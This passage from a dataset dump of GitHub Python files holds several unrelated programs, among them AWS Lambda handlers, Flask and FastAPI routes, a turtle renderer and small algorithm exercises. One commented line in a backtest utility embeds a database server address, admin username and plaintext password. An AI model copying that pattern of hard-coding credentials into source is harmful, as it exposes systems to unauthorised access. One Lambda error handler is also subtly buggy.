(opc==1):\r\n agregarCostototal()\r\n if (opc==2):\r\n agregarCostofijo()\r\n","repo_name":"helbertsandoval/trabajo10_sandoval-sanchez-helbert_cesar_maira_paz","sub_path":"submenu7.py","file_name":"submenu7.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18121296745","text":"import boto3\nfrom botocore.exceptions import BotoCoreError, ClientError\n\ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('cloud9_table')\n\n try:\n response = table.put_item(\n Item={\n 'id': event['id'],\n 'name': event['name'],\n # Add as many attributes as you want\n }\n )\n return {\n 'statusCode': 200,\n 'body': 'Item added!'\n }\n except BotoCoreError as e:\n return {\n 'statusCode': 400,\n 'body': 'Error adding item: {}'.format(e.response['Error']['Message'])\n }\n","repo_name":"zackrylangford/fullstack-serverless","sub_path":"lambda-functions/putFunction.py","file_name":"putFunction.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71414165601","text":"import requests\nfrom pprint import pprint\nimport json\n\nURL = \"https://httpbin.org/put\"\nURL2 = \"https://httpbin.org/get\"\nURL3 = \"https://httpbin.org/delete\"\nr_put = requests.put(URL, data={'key': 'value'})\n\n# print(r_put.status_code)\n# # print(r_put.text)\n\n# r_option = requests.options(URL2)\n# print(type(r_option))\n# print(r_option.text)\n\n# pprint(r_option.headers)\n\nr_delete = requests.delete(URL3)\nprint(r_delete.status_code)\nprint(type(r_delete))\n\nprint(r_delete.text)","repo_name":"liberbell/py31","sub_path":"putoptions.py","file_name":"putoptions.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74006259682","text":"\"\"\"\nparse the rxn.log file to Rxn class, and do analysis\n@log: \n2014-06-23: fix the bug of sorting name\n\"\"\"\n\nfrom operator import itemgetter\n\nclass Mol():\n def __init__(self, line):\n self.id = 0\n self.natom = 0\n self.name = ''\n self.atoms = []\n self.line = line\n self.lifetime = 0\n self.parser()\n\n def parser(self,):\n tokens = self.line.strip().split()\n self.id = int(tokens[0])\n self.natom = int(tokens[1])\n self.name = tokens[2]\n self.atoms = [int(i) for i in tokens[3:]]\n\nclass Rxn():\n def __init__(self, line):\n 
self.nstep = 0\n self.id = 0\n self.nreac = 0\n self.npro = 0\n self.reac = []\n self.pro = []\n self.reacid = []\n self.proid = []\n self.reactag = \"\"\n self.reacidtag = \"\"\n self.line = line\n self.parser()\n\n def parser(self,):\n tokens = self.line.strip().split(None, 3)\n self.nstep = int(tokens[0].split(\"_\")[0])\n self.id = int(tokens[0].split(\"_\")[1])\n self.nreac = int(tokens[1])\n self.npro = int(tokens[2])\n reac = tokens[3].split(\"::\")[0].split(\"+\")\n reac2 = []\n for i in reac:\n for j in i.split():\n reac2.append(j)\n pro = tokens[3].split(\"::\")[1].split(\"+\")\n pro2 = []\n for i in pro:\n for j in i.split():\n pro2.append(j)\n\n for i in range(self.nreac):\n self.reac.append(reac2[2*i])\n self.reacid.append(int(reac2[2*i + 1].strip(\"()\")))\n\n for i in range(self.npro):\n self.pro.append(pro2[2*i])\n self.proid.append(int(pro2[2*i + 1].strip(\"()\")))\n \n # sor the name and id simutaniously\n self.reac, self.reacid = [list(x) for x in zip(*sorted(zip(self.reac, self.reacid), key=itemgetter(0)))]\n self.pro, self.proid = [list(x) for x in zip(*sorted(zip(self.pro, self.proid), key=itemgetter(0)))]\n \n self.reactag = \"_\" + \"_\".join(self.reac)\n self.reactag += \"_=_\"\n self.reactag += \"_\".join(self.pro) + \"_\"\n \n self.reacidtag = \"_\" + \"_\".join([str(i) for i in self.reacid])\n self.reacidtag += \"_=_\"\n self.reacidtag += \"_\".join([str(i) for i in self.proid]) + \"_\"\n\ndef parse_rxn():\n lines = []\n f = open(\"rxn.log\", \"r\")\n for i in f:\n if i.startswith(\"#\"):\n pass\n else:\n if len(i.strip()) > 0:\n lines.append(i)\n return lines\n\ndef parse_molid():\n lines = []\n f = open(\"molid.out\", \"r\")\n for i in f:\n if i.startswith(\"#\"):\n pass\n else:\n if len(i.strip()) > 0:\n lines.append(i)\n return lines\n \ndef output_molid_ext(mols):\n o = open(\"molid.ext\", \"w\")\n for i in mols:\n o.write(\"%6d\"%i.id)\n o.write(\"%6d\"%i.natom)\n o.write(\"%20s\"%i.name)\n o.write(\"%8d\"%i.lifetime)\n o.write(\"\\n\")\n o.close()\n \ndef main():\n pass\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"esemble/simpy","sub_path":"tools/hun/rxn.py","file_name":"rxn.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"26033000944","text":"import csv\nfrom django.db import connection\nimport datetime\nimport pyodbc\nimport random\nimport calculation.Functions_db as func_data\nimport calculation.Calculate as c\nfrom itertools import chain\nimport glob\nimport os\n\n\n#======Database Connections===========================#\n#conn1 = pyodbc.connect('DRIVER={ODBC Driver 11 for SQL Server};SERVER=65.0.33.214;DATABASE=FDS_Datafeeds;UID=sa;PWD=Indxx@1234')\n#cur = conn1.cursor()\n\ndef Load_CSV(file_Name,tax_file_path): \n #final_data = cal.Validate_Read_CSV(file_Name,IDentifier) \n cal = c.Calculation()\n with cal:\n final_data = cal.Load_CSV(file_Name,tax_file_path) \n return final_data\n\ndef Validate_Read_CSV(file_Name, IDentifier, tax_file_path):\n #print('Validate_Read_CSV start') \n #final_data = cal.Validate_Read_CSV(file_Name,IDentifier) \n cal = c.Calculation()\n with cal:\n final_data = cal.Validate_Read_CSV(file_Name,IDentifier,tax_file_path) \n #print('final_data:',final_data) \n return final_data\n \ndef Cal_Index(D_Index,csv_data): \n #files = cal.Cal_Index(D_Index,D_Data,D_ISIN,D_Date,quote_data,last_Period,cur)\n files ={}\n cal = c.Calculation()\n with cal:\n files = cal.Cal_Index(D_Index,csv_data)\n return files\n\n\ndef 
handle_uploaded_file(file, confirmbox):\n\n if file:\n #print('file is there')\n #print(file)\n random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n file_name = random_id+'-'+file.name\n if confirmbox == '': \n with open('./static/backtest-file/input/'+file_name, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n print('handle_uploaded_file end')\n return file_name\n\n\n# def save_input_file(input_file,save_data):\n# print('input_file save hare ')\n# file=input_file\n# random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n# save_inputfile = random_id+'-'+file.name\n# print('save_file',save_inputfile)\n# if save_data=='yes':\n# with open('./static/backtest-file/input_file_save/'+save_inputfile, 'wb+') as destination:\n# for chunk in input_file.chunks():\n# destination.write(chunk)\n# return True\ndef save_input_file(input_file):\n print('input_file save hare ')\n file=input_file\n random_id = ''.join([str(random.randint(0, 999)).zfill(3) for _ in range(2)])\n save_inputfile = random_id+'-'+file.name\n input_file_location = './static/backtest-file/rerun_input_files/'+save_inputfile\n\n with open('./static/backtest-file/rerun_input_files/'+save_inputfile, 'wb+') as destination:\n for chunk in input_file.chunks():\n destination.write(chunk)\n file_with_location={'save_inputfile':save_inputfile,'input_file_location':input_file_location}\n return file_with_location\n\ndef remove_percent_symbole(weight):\n weight = list(weight)\n weight = weight[:-1]\n weight = ''.join([str(elem) for elem in weight])\n return weight\n\ndef Rerun_Dbdata(D_Index, start_date, end_date, Period, get_composition):\n D_Data ={}\n D_ISIN ={}\n D_Date ={}\n data = []\n D_RIC_ISIN = {}\n quote_data = {}\n \n st_date = str(Period[\"Last\"])+\"_START\"\n en_date = str(Period[\"Last\"])+\"_END\"\n \n D_Date[st_date] = start_date\n D_Date[en_date] = end_date\n comp_isin =[]\n outer_comp_list =[]\n for data_composition in get_composition:\n comp_data = []\n weights = data_composition.weights\n weights = float(weights)\n comp_data.append(Period[\"Last\"])\n comp_data.append(data_composition.isin)\n comp_data.append(weights)\n comp_data.append(start_date)\n comp_data.append(end_date)\n comp_data.append(data_composition.country)\n comp_data.append(data_composition.ric)\n outer_comp_list.append(comp_data)\n comp_isin.append(data_composition.isin)\n D_RIC_ISIN[data_composition.ric] = data_composition.isin\n quote_data[data_composition.isin] = data_composition.quote_id\n data.append(outer_comp_list)\n D_Data[str(Period[\"Last\"])] = outer_comp_list\n D_ISIN [str(Period[\"Last\"])] = comp_isin\n #save_file = Cal_Index(D_Index, D_Data, D_ISIN, D_Date, D_RIC_ISIN, period)\n #return save_file\n files ={}\n cal = c.Calculation()\n with cal:\n tax_Rate = func_data.Read_Tax('')\n #print(tax_Rate)\n #files = cal.Cal_Index(D_Index,D_Data,D_ISIN,D_Date,quote_data,Period,comp_isin,tax_Rate)\n csv_data={}\n csv_data['D_Data']=D_Data\n csv_data['D_ISIN']=D_ISIN\n csv_data['D_Date']=D_Date\n csv_data['Period']=Period\n csv_data['ISIN_LIST']=comp_isin\n csv_data[\"Tax_Rate\"]=tax_Rate\n csv_data[\"MISSING_RIC_ISIN_LIST\"]=''\n csv_data[\"D_ISIN_RIC\"]=D_RIC_ISIN\n\n print('csv_data:',csv_data)\n files = cal.Cal_Index(D_Index,csv_data)\n\n return files\n\n\ndef Rerun_Dbdata1(D_Index,file_name,end_date):\n taxFileName=''\n csv_data1 = Load_CSV('./static/backtest-file/rerun_input_files/'+str(file_name),taxFileName)\n csv_data=csv_data1\n\n #print('csv_data in 
Rerun_Dbdata1:',csv_data)\n #print('csv_data[D_Date]',csv_data['D_Date'])\n a=csv_data['D_Date']\n last_peroid = list(csv_data['D_Date'])[-1]\n #dict = {last_peroid:date}\n dict = {last_peroid:end_date}\n #print('...',dict)\n a.update(dict)\n # print('update_dict',a)\n # print(csv_data['D_Date']['2_END'])\n # print('Updated_csv',csv_data)\n\n cal = c.Calculation()\n with cal:\n files = cal.Cal_Index(D_Index,csv_data)\n return files\n\n\n\ndef DateTime(current_time):\n date_time = datetime.datetime.strptime(current_time, \"%m-%d-%Y\")\n cr_date = date_time.strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n return cr_date","repo_name":"rafindx/Backtest","sub_path":"calculation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23565248744","text":"\"\"\" Problem statement:\nhttps://leetcode.com/problems/min-stack/description/\n--------------------------------------------------------------------------------\nDesign a stack that supports push, pop, top, and retrieving the minimum element\nin O(1) time.\n\npush(x) -- Push element x onto stack.\npop() -- Removes the element on top of the stack.\ntop() -- Get the top element.\ngetMin() -- Retrieve the minimum element in the stack.\n--------------------------------------------------------------------------------\nImplementation of min stack in Python is the following.\nImplement a regular stack data structure using array. Then initialize another\narray within that's gonna hold the indices of minimum elements. Treat this array\nas stack. So the index of last minimum element is gonna be the last element in\nthis stack. This way can always keep track of the next minimum element when we\npop the current minimum element from the stack. 
Details below.\n\"\"\"\n\n\nclass MinStack:\n def __init__(self):\n \"\"\" Array self.elements is gonna hold all the elements of the stack,\n array self.min_index is gonna hold indices of minimum elements.\n \"\"\"\n self.elements = [] # current elements on the stack\n self.min_index = [] # indices of min elements\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n self.elements.append(x)\n if not self.min_index \\\n or self.elements[-1] < self.elements[self.min_index[-1]]:\n self.min_index.append(len(self.elements) - 1)\n\n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n # special case, stack is empty\n if not self.elements:\n return # do nothing\n # to-be-removed element is current min\n if self.min_index[-1] == len(self.elements) - 1:\n self.min_index.pop() # update current min index\n self.elements.pop() # remove element\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if not self.elements: # stack is empty\n return -1\n return self.elements[-1]\n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if not self.elements: # stack is empty\n return -1\n return self.elements[self.min_index[-1]] # return element at min index\n\n\nif __name__ == \"__main__\":\n stack = MinStack()\n\n stack.push(1)\n stack.push(2)\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n stack.push(-2)\n stack.push(3)\n stack.push(4)\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n stack.pop()\n stack.pop()\n stack.pop()\n print(f\"last element is {stack.top()}, min element is {stack.getMin()}\")\n","repo_name":"vladn90/Algorithms","sub_path":"Stack/min_stack.py","file_name":"min_stack.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43643739550","text":"import boto3\nimport json\nimport os\n\nfrom boto3.dynamodb.types import TypeDeserializer\nfrom botocore.exceptions import ClientError\n\nprint(\"Loading function\")\n\nses = boto3.client(\"ses\")\ntd = TypeDeserializer()\n\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n for record in event[\"Records\"]:\n print(record[\"eventID\"])\n print(record[\"eventName\"])\n print(\"DynamoDB Record: \" + json.dumps(record[\"dynamodb\"], indent=2))\n\n data = record[\"dynamodb\"].get(\"NewImage\")\n d = {}\n for key in data:\n d[key] = td.deserialize(data[key])\n\n print(d)\n\n send_email(d)\n\n print(\"Successfully processed {} records.\".format(len(event[\"Records\"])))\n\n\ndef send_email(data):\n SENDER = os.environ[\"SENDER\"]\n CHARSET = \"UTF-8\"\n SUBJECT = \"Pinehead Records: Order Confirmation\"\n\n BODY_TEXT = (\n \"Pinehead Records: Order Confirmation\\r\\n\"\n f\"Order ID: {data['id']}\"\n f\"Album: {data['album']['title']} ({data['album']['year']})\"\n f\"Format: {data['album']['format']}\"\n f\"Amount: {data['amount']}\"\n )\n\n BODY_HTML = f\"\"\"\n \n \n

<h1>Pinehead Records: Order Confirmation</h1>\n    <ul>\n      <li>Order ID: {data['id']}</li>\n      <li>Album: {data['album']['title']}</li>\n      <li>Format: {data['album']['format']}</li>\n      <li>Amount: {data['amount']}</li>\n    </ul>
\n \n \n \"\"\"\n\n try:\n response = ses.send_email(\n Destination={\"ToAddresses\": [data[\"email\"]]},\n Message={\n \"Body\": {\n \"Html\": {\"Charset\": CHARSET, \"Data\": BODY_HTML},\n \"Text\": {\"Charset\": CHARSET, \"Data\": BODY_TEXT},\n },\n \"Subject\": {\"Charset\": CHARSET, \"Data\": SUBJECT},\n },\n Source=SENDER,\n )\n except ClientError as e:\n print(e.response[\"Error\"][\"Message\"])\n else:\n print(\"Email sent! Message ID:\"),\n print(response[\"MessageId\"])\n","repo_name":"linuxacademy/content-dynamodb-deepdive","sub_path":"6.1.2-Triggers/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"54"} +{"seq_id":"26638998698","text":"\nimport math\nfrom renderer_base import RendererBase\n\n\nclass Turtle:\n \"\"\"\n This is a faster turtle implementation than the built in turtle implementation\n \"\"\"\n\n def __init__(self):\n self._x = 0\n self._y = 0\n self._angle = 0\n\n self._min_x = 0\n self._max_x = 0\n self._min_y = 0\n self._max_y = 0\n\n self._lines = []\n self._poly_lines = []\n self._widths = []\n self._colours = []\n self._fill_colours = []\n\n self._width = 1\n self._colour = (0, 0, 0, 255)\n self._fill_colour = (0, 0, 0, 255)\n self._state = False\n self._is_poly = False\n\n def render(self, renderer: RendererBase, auto_scale=True, auto_offset=True, auto_margin=0.1, flush=True):\n \"\"\"\n Renders the line and polygons using the given renderer\n\n :param renderer: The renderer object extending RendererBase, used to render the lines and polygons\n :param auto_scale: If true, automatically scald the turtle's drawing to fit the canvas size\n :param auto_offset: If true, automatically places the turtle's drawing in the center of the canvas\n :param auto_margin: The margin to the edge of the renderer's canvas for auto_scale\n :param flush: If true, the existing line and polygon data will be deleted\n \"\"\"\n\n w = self._max_x - self._min_x\n h = self._max_y - self._min_y\n\n scale = min((renderer.size[0] * (1.0 - auto_margin)) / w, (renderer.size[1] * (1.0 - auto_margin)) / h)\n\n screen_center_x = renderer.size[0] / 2\n screen_center_y = renderer.size[1] / 2\n\n real_center_x = (self._max_x - (w / 2))\n real_center_y = (self._max_y - (h / 2))\n\n if auto_scale:\n renderer.setup_scale(scale)\n real_center_x *= scale\n real_center_y *= scale\n if auto_offset:\n offset_x = screen_center_x - real_center_x\n offset_y = screen_center_y - real_center_y\n renderer.setup_offset(offset_x, offset_y)\n\n renderer.draw_polygons(self._poly_lines, self._fill_colours)\n renderer.draw_lines(self._lines, self._widths, self._colours)\n\n if flush:\n self._lines = []\n self._widths = []\n self._colours = []\n self._poly_lines = []\n self._fill_colours = []\n\n def _draw(self, distance):\n \"\"\"\n Draws a line while moving forward\n\n :param distance: The distance to move forward\n \"\"\"\n\n x0 = self._x\n y0 = self._y\n self._move(distance)\n self._add_line(x0, y0)\n\n def _check_minmax(self):\n \"\"\"\n Checks the minimum and maxiumum x, y coordinates to enable auto_offset and auto_scale later\n \"\"\"\n\n if self._x - self._width * 0.5 < self._min_x:\n self._min_x = self._x - self._width * 0.5\n elif self._x + self._width * 0.5 > self._max_x:\n self._max_x = self._x + self._width * 0.5\n\n if self._y - self._width * 0.5< self._min_y:\n self._min_y = self._y - self._width * 0.5\n elif self._y + self._width * 0.5 > self._max_y:\n self._max_y = 
self._y + self._width * 0.5\n\n def _add_line(self, x0, y0):\n \"\"\"\n Adds another drawn line\n\n :param x0: The starting x coordinate\n :param y0: The starting y coordinate\n \"\"\"\n\n self._check_minmax()\n self._lines.append((x0, y0, self._x, self._y))\n self._widths.append(int(self._width))\n self._colours.append(self._colour)\n\n def _add_poly(self):\n \"\"\"\n Adds another point to the current polygon\n \"\"\"\n\n if not self._state:\n self._check_minmax()\n\n self._poly_lines[-1].append((self._x, self._y))\n\n def _move(self, distance):\n self._x -= math.cos(self._angle * 0.01745329251) * distance\n self._y -= math.sin(self._angle * 0.01745329251) * distance\n\n def _int4_tuple(self, t, v0, v1, v2, v3):\n return tuple([int(v) for v in t + (v0, v1, v2, v3)[:4-len(t)]])\n\n def forward(self, distance):\n \"\"\"\n Moves the turtle forward\n\n :param distance: The distance to move forward\n \"\"\"\n\n if self._state:\n self._draw(distance)\n else:\n self._move(distance)\n\n if self._is_poly:\n self._add_poly()\n\n def backward(self, distance):\n \"\"\"\n Moves the turtle backward\n\n :param distance: The distance to move backward\n \"\"\"\n\n if self._state or self._is_poly:\n self._draw(- distance)\n else:\n self._move(- distance)\n\n if self._is_poly:\n self._add_poly()\n\n def pendown(self):\n \"\"\"\n Begins the drawing of lines with the turtle's width and colour\n \"\"\"\n\n self._state = True\n\n def penup(self):\n \"\"\"\n Ends the drawing of lines\n \"\"\"\n\n self._state = False\n\n def begin_poly(self):\n \"\"\"\n Begins the drawing of a polygon with the turtle's fillcolour\n \"\"\"\n\n self._is_poly = True\n self._poly_lines.append([])\n self._poly_lines[-1].append((self._x, self._y))\n\n def end_poly(self):\n \"\"\"\n Ends the drawing of the polygon\n \"\"\"\n\n self._is_poly = False\n self._fill_colours.append(self._fill_colour)\n\n def right(self, angle):\n \"\"\"\n Turns the turtle right\n\n :param angle: The angle to turn right\n \"\"\"\n\n self._angle += angle\n\n def left(self, angle):\n \"\"\"\n Turns the turtle left\n\n :param angle: The angle to turn left\n \"\"\"\n\n self._angle -= angle\n\n def get_heading(self):\n \"\"\"\n Returns the heading of the turtle\n\n :return: Float angle of turtle\n \"\"\"\n\n return self._angle\n\n def get_position(self):\n \"\"\"\n Returns the x, y coordinates of the turtle\n\n :return: Tuple XY\n \"\"\"\n\n return self._x, self._y\n\n def set_heading(self, angle):\n \"\"\"\n Directly sets the heading of the turtle\n\n :param angle: The new heading angle\n \"\"\"\n\n self._angle = angle\n\n def pencolour(self, r, g=0, b=0, a=255):\n \"\"\"\n Sets the colour of the line drawn by the turtle\n\n :param r: Either a tuple of RGBA, or the red value\n :param g: The green value\n :param b: The blue value\n :param a: The alpha value\n \"\"\"\n\n if isinstance(r, tuple):\n self._colour = self._int4_tuple(r, 0, g, b, a)\n else:\n self._colour = (r, g, b, a)\n\n def fill(self, r, g=0, b=0, a=255):\n \"\"\"\n Sets the fill colour of the polygon drawn by the turtle\n\n :param r: Either a tuple of RGBA, or the red value\n :param g: The green value\n :param b: The blue value\n :param a: The alpha value\n \"\"\"\n\n if isinstance(r, tuple):\n self._fill_colour = r\n else:\n self._fill_colour = (r, g, b, a)\n\n def set_position(self, pos, y=None):\n \"\"\"\n Directly sets the position of the turtle (with drawing a line if the pen is down)\n\n :param pos: Either a tuple of XY, or the new x value\n :param y: The new y value\n \"\"\"\n\n x0 = self._x\n 
y0 = self._y\n\n if isinstance(pos, tuple):\n self._x = pos[0]\n self._y = pos[1]\n else:\n self._x = pos\n self._y = y\n\n if self._state:\n self._add_line(x0, y0)\n if self._is_poly:\n self._add_poly()\n\n def goto(self, pos, y=None):\n \"\"\"\n Same as Turtle.set_position\n \"\"\"\n\n self.set_position(pos, y)\n\n def set_x(self, x):\n \"\"\"\n Directly sets the x coordinate of the turtle (with drawing a line if the pen is down)\n\n :param x: The new x coordinate\n \"\"\"\n\n x0 = self._x\n\n self._x = x\n if self._state:\n self._add_line(x0, self._y)\n if self._is_poly:\n self._add_poly()\n\n def set_y(self, y):\n \"\"\"\n Directly sets the y coordinate of the turtle (with drawing a line if the pen is down)\n\n :param y: The new y coordinate\n \"\"\"\n\n y0 = self._y\n\n self._y = y\n if self._state:\n self._add_line(self._x, y0)\n if self._is_poly:\n self._add_poly()\n\n def pensize(self, size):\n \"\"\"\n Sets the pen size (/ width) of the turtle\n\n :param size: The new size\n \"\"\"\n\n self._width = size\n\n def get_size(self):\n \"\"\"\n Returns the size of the turtle's pen\n \"\"\"\n return self._width\n\n def get_colour(self):\n \"\"\"\n Returns the turtle's pen colour\n\n :return: Tuple RGBA\n \"\"\"\n\n return self._colour\n\n def get_fill(self):\n \"\"\"\n Returns the turtle's fill colour for polygons\n\n :return: Tuple RGBA\n \"\"\"\n\n return self._fill_colour\n","repo_name":"Inspiaaa/Faster-Turtle","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28425435770","text":"from fastapi import APIRouter, Request, Response, Depends\n\nfrom ....core.config import logger\nfrom ....crud import attachment\n\nrouter = APIRouter()\n\n\nasync def verify_module_access(request: Request, module_name: str):\n logger.debug('Request type: ' + request.method)\n logger.debug('Module: ' + module_name)\n\n\n@router.post('/{module_name}', dependencies=[Depends(verify_module_access)], status_code=201)\nasync def create_attachment(module_name: str, request_data: dict, response: Response):\n result = await attachment.post_attachment_new(module_name, request_data['new_document'])\n\n returnResponse = {}\n if 'type' in result:\n if result['type'] == 'error' or result['type'] == 'exception':\n response.status_code = 400\n\n if result['type'] == 'exception':\n returnResponse['errorType'] = result['errorType']\n returnResponse['errorMessage'] = result['errorMessage']\n\n returnResponse['message'] = result['message']\n return returnResponse\n\n\n@router.delete('/{module_name}/{file_id}', dependencies=[Depends(verify_module_access)], status_code=200)\nasync def delete_attachment(module_name: str, file_id: str, response: Response):\n result = await attachment.delete_attchment_from_api(module_name, file_id)\n\n returnResponse = {}\n if 'type' in result:\n if result['type'] == 'error' or result['type'] == 'exception':\n response.status_code = 400\n\n if result['type'] == 'exception':\n returnResponse['errorType'] = result['errorType']\n returnResponse['errorMessage'] = result['errorMessage']\n\n returnResponse['message'] = result['message']\n return returnResponse\n","repo_name":"sujalkpatel/crm_fastAPI","sub_path":"app/api/api_v1/endpoints/attachment.py","file_name":"attachment.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6509922383","text":"import 
torch.nn as nn\n\n\nclass CharacterLanguageModel(nn.Module):\n def __init__(\n self,\n no_characters,\n embedding_dim,\n no_layers,\n lstms_hidden,\n lstm_out,\n last_time_step_only=True,\n ):\n super().__init__()\n\n self.embedding = nn.Embedding(no_characters + 1, embedding_dim)\n self._last_only = last_time_step_only\n\n class DropHidden(nn.Module):\n def __init__(self, lstm):\n super().__init__()\n self.lstm = lstm\n\n def forward(self, X):\n X, _ = self.lstm(X)\n return X\n\n sizes = [embedding_dim, *[lstms_hidden] * no_layers, lstm_out]\n self.lstms = nn.Sequential(\n *[\n DropHidden(nn.LSTM(_in, _out, batch_first=True))\n for _in, _out in zip(sizes[:-1], sizes[1:])\n ]\n )\n self.output_layer = nn.Linear(lstm_out, no_characters)\n\n @property\n def number_of_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)\n\n def forward(self, X):\n X = self.embedding(X)\n X = self.lstms(X)\n if self._last_only:\n X = X[:, -1] # taking last time step\n X = self.output_layer(X)\n\n return X\n","repo_name":"arod40/nlp-ass3","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12203479607","text":"\"\"\"\nBaekJoon 27930번 문제\n당신은 운명을 믿나요?\n2023 고려대학교x연세대학교 프로그래밍 경시대회 Open Contest\n\n문제 풀이\n\"\"\"\n\n\nclass AreYouTrustDestiny:\n def __init__(self):\n self._destiny_string_part_list = list(input())\n self._korea_univ = [\"K\", \"O\", \"R\", \"E\", \"A\"]\n self._yonsei_univ = [\"Y\", \"O\", \"N\", \"S\", \"E\", \"I\"]\n self._korea_check_count = 0\n self._yonsei_check_count = 0\n self.DestinyResult()\n\n def _check_destiny(self) -> str:\n for destiny_part in self._destiny_string_part_list:\n if self._yonsei_check_count == 6:\n return \"YONSEI\"\n\n elif self._korea_check_count == 5:\n return \"KOREA\"\n\n self._yonsei_check_count += 1 if destiny_part == self._yonsei_univ[self._yonsei_check_count] else 0\n self._korea_check_count += 1 if destiny_part == self._korea_univ[self._korea_check_count] else 0\n\n def DestinyResult(self):\n destiny_result = self._check_destiny()\n if destiny_result is not None:\n print(destiny_result)\n\n\nif __name__ == '__main__':\n AYTD = AreYouTrustDestiny()\n","repo_name":"ABER1047/BaekJoon-Study","sub_path":"[Source_Code] APSODE/2023_04_03.py","file_name":"2023_04_03.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11912819726","text":"from flask import Blueprint, render_template, url_for, redirect, flash, request, abort\nfrom flask_login import login_required, current_user\nfrom market import db\nfrom market.models import User_post\nfrom Posts.forms import New_article\n\nposts = Blueprint('posts', __name__)\n\n# ROUTE TO CREATE NEW ARTICLE\n@posts.route('/article', methods=['GET', 'POST'])\n@login_required\ndef new_article():\n form = New_article()\n\n if form.validate_on_submit():\n post = User_post(title = form.title.data, content = form.content.data, author = current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post has been created!', 'success')\n return redirect(url_for('main.home'))\n\n return render_template('create-article.html', title = 'New Article', form=form, legend='New Post')\n\n@posts.route('/update/', methods=['GET', 'POST'])\n@login_required\ndef update_article(article_id):\n post = User_post.query.get_or_404(article_id)\n if post.author != 
current_user:\n abort(403)\n form = New_article()\n # UPDATE THE ARTICLE TITLE AND CONTENT\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n return redirect(url_for('users.view_article', article_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n\n return render_template('update.html', title = 'Update', form=form, legend='Edit Article', post=post)\n\n@posts.route('/delete/', methods=['GET'])\n@login_required\ndef delete_article(article_id):\n post = User_post.query.get_or_404(article_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted!', 'success')\n return redirect(url_for('main.home'))","repo_name":"Adekemi02/NetBlog","sub_path":"Posts/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25664011015","text":"#!/usr/bin/env python\n#\n# Remove files quickly from a directory. You can compress or archive them also instead.\n#\n#\n\nimport os,sys,optparse,time,shutil,gzip\n\ndef mkArchiveDir():\n if not (os.path.exists(archivepath)):\n os.mkdir(archivepath)\n\ndef delete(x):\n os.unlink(x)\n\ndef archive(x):\n mkArchiveDir()\n shutil.move(x, archivepath)\n print(\"a\")\n\ndef compress(x):\n mkArchiveDir()\n in_data = open(x, \"rb\").read()\n out_gz = archivepath + x + \".gz\"\n gzf = gzip.open(out_gz, \"wb\")\n gzf.write(in_data)\n gzf.close()\n delete(x)\n\ndef main():\n parser = optparse.OptionParser('[-] Usage: dircleaner.py '+ '-p -s -a ')\n parser.add_option('-p', dest='path', type='string', help='work path')\n parser.add_option('-s', dest='seconds', type='int', help='number of seconds in the past since now')\n parser.add_option('-a', dest='action', type='string', help='a = archive, ca = compress and archive, d = delete files')\n (options, args) = parser.parse_args()\n\n if (options.path == None) | (options.seconds == None) | (options.action == None):\n sys.exit(parser.usage)\n\n path = options.path\n seconds = options.seconds\n action = options.action\n\n global archivepath\n archivepath = path + \"archive/\"\n\n if (action != \"a\") & (action != \"d\") & (action != \"ca\"):\n sys.exit(\"Valid actions are:\\n\\na = archive, ca = compress and archive, d = delete files\\n\\nInsert coin and try again! 
